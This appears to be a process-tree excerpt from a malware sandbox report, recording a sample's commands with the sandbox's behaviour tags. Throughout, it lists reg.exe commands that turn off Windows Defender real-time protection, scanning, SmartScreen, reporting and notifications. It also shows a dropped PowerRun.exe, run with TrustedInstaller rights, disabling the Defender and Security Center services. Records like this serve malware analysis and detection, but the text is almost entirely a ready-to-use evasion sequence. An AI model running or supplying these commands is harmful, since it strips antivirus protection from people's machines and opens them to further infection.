C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f7⤵PID:1844
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f7⤵PID:4920
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f7⤵PID:1264
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f7⤵PID:4820
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f7⤵PID:2880
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f7⤵PID:1428
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f7⤵PID:4316
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f7⤵PID:3144
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f7⤵PID:1980
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f7⤵PID:4992
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f7⤵PID:1076
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f7⤵PID:3904
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f7⤵PID:4512
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
PID:1492
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
PID:3600
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
PID:3104
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f7⤵PID:3840
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
PID:488
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f7⤵PID:5088
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
PID:3096
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f7⤵PID:3312
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f7⤵PID:2624
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f7⤵PID:4284
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f7⤵PID:2088
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f7⤵PID:4268
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f7⤵PID:3516
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f7⤵PID:4300
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f7⤵PID:4400
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f7⤵PID:4184
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f7⤵PID:4696
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f7⤵PID:2436
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f7⤵PID:1844
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f7⤵PID:4388
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f7⤵PID:1604
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f7⤵PID:1220
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f7⤵PID:4824
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f7⤵PID:4084
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f7⤵PID:2084
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f7⤵PID:508
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f7⤵PID:5060
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f7⤵PID:2696
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f7⤵PID:3144
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f7⤵PID:1420
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f7⤵PID:2956
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f7⤵PID:1076
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f7⤵PID:2940
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f7⤵PID:4856
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f7⤵PID:3552
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f7⤵PID:4500
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f7⤵PID:2884
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f7⤵PID:2500
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f7⤵PID:2692
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f7⤵PID:2336
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f7⤵
- Modifies Windows Defender notification settings
PID:3312
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f7⤵PID:4192
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exePowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:3100
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:2084
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f9⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4268 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:312
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exePowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:1108
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:3144
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5064
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:1420
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exePowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:4816
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:4400
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:1864
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5036
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exePowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:5064
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:4552
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:508
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:2624
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exePowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:756 -
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:4208
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5000
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:3132
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exePowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:4532
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:1864
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:4304
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:3860
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exePowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:1640
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:5060
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:3004
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:4140
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exePowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:4532
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:5000
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:1076
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5060
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1108
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exePowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:312
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4304 -
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f9⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1640 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:3356
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exePowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3100 -
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:312
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f9⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4184 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:4300
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exePowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:1980
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Windows security modification
PID:2252 -
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5064
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:744
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵PID:4512
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exePowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:2084
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:3584
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f9⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3004 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:3904
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exePowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:2696
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:2996
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:4140
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f10⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1864
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exePowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:4552
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:3840
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:2032
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:2464
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exePowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
PID:4012 -
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
PID:4640 -
